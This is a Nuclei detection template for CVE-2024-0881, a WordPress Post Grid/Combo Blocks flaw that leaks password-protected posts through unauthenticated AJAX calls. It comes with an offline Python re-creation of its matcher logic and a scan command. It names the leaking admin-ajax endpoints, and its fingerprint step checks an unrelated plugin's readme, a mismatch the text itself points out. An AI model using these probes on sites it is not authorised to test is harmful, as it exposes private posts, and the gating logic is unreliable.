
Combo Blocks < 2.2.76 - Improper Access Control

ID: CVE-2024-0881

Severity: medium

Author: s4e-io

Tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure

The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts.

id: CVE-2024-0881

info:
  name: Combo Blocks < 2.2.76 - Improper Access Control
  author: s4e-io
  severity: medium
  description: |
    The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
  reference:
    - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0881
  classification:
    cve-id: CVE-2024-0881
    cwe-id: CWE-284
    epss-score: 0.00043
    epss-percentile: 0.08268
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/user-meta/"
  tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"

    matchers:
      - type: word
        internal: true
        words:
          - "User Profile Builder"

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"html"'
          - '"<div class='
          - '"pagination":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201a25dcafd4d1875ccdbe6127e14054779bfffe3b78220c832f29346446bfab7d022100a5993a223b25f1319317ad1d795aff1c5419e105a91c565c1480fd7ebb41aabc:922c64590222798bb761d5b6d8e72950
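The template above chains two requests: the first one is an internal fingerprint (its matcher only gates the flow and never reports by itself), and the second one probes two AJAX actions, stopping at the first path whose response is a 200 that contains all three listed substrings. The following Python re-implements exactly that matching logic over constructed responses so the evaluation order and the edge cases (fingerprint missing, empty JSON, non-200 status) can be traced offline. It is an added example, not part of the template or of Nuclei, and the response bodies are made up for illustration; note also that the gating request reads `/wp-content/plugins/user-meta/readme.txt`, a path that does not name the Combo Blocks plugin, so a host without that file is never sent the second request.

```python
"""Offline re-implementation of the CVE-2024-0881 Nuclei template's matcher
logic (added example; not the template's own code, not Nuclei's)."""
from dataclasses import dataclass


@dataclass
class Response:
    """Minimal stand-in for an HTTP response. All instances below are
    constructed sample data, not captured traffic."""
    status: int
    body: str


def words_match(body: str, words: list[str], condition: str = "or") -> bool:
    """Nuclei 'word' matcher: with condition 'and' every word must appear in
    the body, with the default 'or' any single word is enough."""
    hits = [w in body for w in words]
    return all(hits) if condition == "and" else any(hits)


def fingerprint_matches(readme: Response) -> bool:
    """Request 1: the 'internal: true' matcher. It decides whether the flow
    continues to http(2); it never produces a finding on its own."""
    return words_match(readme.body, ["User Profile Builder"])


def ajax_response_matches(resp: Response) -> bool:
    """Request 2: both matchers are combined with matchers-condition: and."""
    body_ok = words_match(
        resp.body, ['{"html"', '"<div class=', '"pagination":'], condition="and"
    )
    status_ok = resp.status in (200,)
    return body_ok and status_ok


def evaluate_template(readme: Response, ajax_responses: list[Response]) -> dict:
    """flow: http(1) && http(2), with stop-at-first-match on the second
    request. Returns the fingerprint result and the index of the first AJAX
    path that matched (None when no path matched)."""
    if not fingerprint_matches(readme):
        return {"fingerprint": False, "matched_path": None}
    for idx, resp in enumerate(ajax_responses):
        if ajax_response_matches(resp):
            return {"fingerprint": True, "matched_path": idx}
    return {"fingerprint": True, "matched_path": None}


# Constructed sample responses (illustrative only).
README_MATCH = Response(200, "=== User Profile Builder ===\nStable tag: 1.0\n")
README_OTHER = Response(200, "=== Some Other Plugin ===\nStable tag: 3.1\n")
# Populated grid: all three substrings present, status 200 -> match.
AJAX_GRID = Response(
    200,
    '{"html":"<div class=\\"post-grid-item\\"><p>post body</p></div>",'
    '"pagination":"<span>1</span>"}',
)
# Empty grid: JSON keys present but no '"<div class=' -> no match.
AJAX_EMPTY = Response(200, '{"html":"","pagination":""}')
# Same markup but the action was refused -> status matcher fails.
AJAX_DENIED = Response(
    403, '{"html":"<div class=\\"x\\"></div>","pagination":""}'
)

if __name__ == "__main__":
    print(evaluate_template(README_MATCH, [AJAX_EMPTY, AJAX_GRID]))
    print(evaluate_template(README_OTHER, [AJAX_GRID]))
    print(evaluate_template(README_MATCH, [AJAX_DENIED, AJAX_EMPTY]))
```

Walking the three calls at the bottom: the first reports `matched_path: 1` because the empty-grid response on the first path fails the word matcher and the second path satisfies both matchers; the second never reaches the AJAX probes because the fingerprint fails; the third fingerprints but reports no match, since a 403 fails the status matcher and an empty grid fails the word matcher.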

This Nuclei template detects the issue described above. Run it with Nuclei against the base URL of the site to check:

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-0881.yaml"
